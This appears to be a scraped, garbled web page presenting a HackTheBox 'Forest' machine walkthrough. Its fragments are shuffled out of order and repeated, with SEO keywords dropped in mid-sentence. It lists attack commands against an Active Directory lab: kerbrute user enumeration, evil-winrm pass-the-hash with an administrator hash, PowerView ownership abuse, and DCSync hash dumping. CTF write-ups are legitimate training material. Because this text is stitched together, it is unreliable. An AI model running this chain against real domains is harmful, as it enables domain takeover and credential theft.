Forest Hackthebox Walkthrough Best May 2026

kerbrute userenum --dc 10.10.10.161 -d htb.local /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt But for efficiency, we can also use ldapsearch :

aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90f43dfa1e816ec0a1c8 Use evil-winrm again with the administrator hash: forest hackthebox walkthrough best

From BloodHound, we see that svc-alfresco has WriteOwner on Exchange Windows Permissions . Use PowerView (upload via WinRM) or net commands: kerbrute userenum --dc 10

nmap -sC -sV -oA forest_initial 10.10.10.161 | Port | Service | State | Observation | |------|---------|-------|--------------| | 53 | DNS | Open | Domain: htb.local | | 88 | Kerberos | Open | Key Distribution Center | | 135 | MSRPC | Open | | | 139/445 | SMB | Open | NetBIOS | | 389 | LDAP | Open | Anonymous bind allowed? | | 5985 | WinRM | Open | Potential for remote execution | | 9389 | .NET Remoting | Open | | Then, we abuse DCSync to dump domain hashes

evil-winrm -i 10.10.10.161 -u administrator -H 32693b11e6aa90f43dfa1e816ec0a1c8 Now list the root directory:

# Upload PowerView.ps1 upload /usr/share/powershell-empire/empire/server/data/module_source/situational_awareness/network/powerview.ps1 Import-Module .\powerview.ps1 Take ownership of the group Set-DomainObjectOwner -Identity "Exchange Windows Permissions" -OwnerIdentity "svc-alfresco" Step 5: Grant DCSync Rights Now that we own the group, we can add ourselves to it. Then, we abuse DCSync to dump domain hashes.

Port 5985 is open, meaning we can use Evil-WinRM later—no need for RDP. DNS & Domain Dump Add the machine to your /etc/hosts file: